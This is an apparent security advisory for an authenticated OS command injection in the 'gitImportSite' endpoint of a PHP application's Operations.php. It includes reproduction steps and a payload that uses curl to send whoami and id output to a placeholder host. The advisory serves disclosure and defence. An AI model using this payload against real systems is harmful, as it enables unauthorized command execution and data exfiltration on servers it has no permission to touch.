The 'gitImportSite' functionality obtains a URL string from a POST request and insufficiently validates user input. The ’setremote’ function later passes this input into ’procopen’, yielding OS command injection.
The vulnerability exists in the logic of the ’gitImportSite’ function, located in ’Operations.php’. The current implementation only relies on the ’filter_var’ and 'strpos' functions to validate the URL, which is not sufficient to ensure absence of all Bash special characters used for command injection.
• Operations.php:2103 gitImportSite() • \<domain\>/\<user\>/system/api/gitImportSite
To replicate this vulnerability, authenticate and send a POST request to the 'gitImportSite' endpoint with a crafted URL in the JSON data. Note, a valid token needs to be obtained by capturing a request to another API endpoint (such as 'archiveSite').
Start a webserver.
Initiate a request to the ’archiveSite’ endpoint.
Capture and modify the request in BurpSuite.
Observe command output in the HTTP request from the server.
http://<IP>/.git;curl${IFS}<IP>/$(whoami)/$(id)#=abcdef
An authenticated attacker can craft a URL string that bypasses the validation checks employed by the ’filter_var’ and ’strpos’ functions in order to execute arbitrary OS commands on the backend server. The attacker can exfiltrate command output via an HTTP request.
{ "nvd_published_at": "2025-06-09T21:15:47Z", "cwe_ids": [ "CWE-78" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2025-06-09T20:30:34Z" }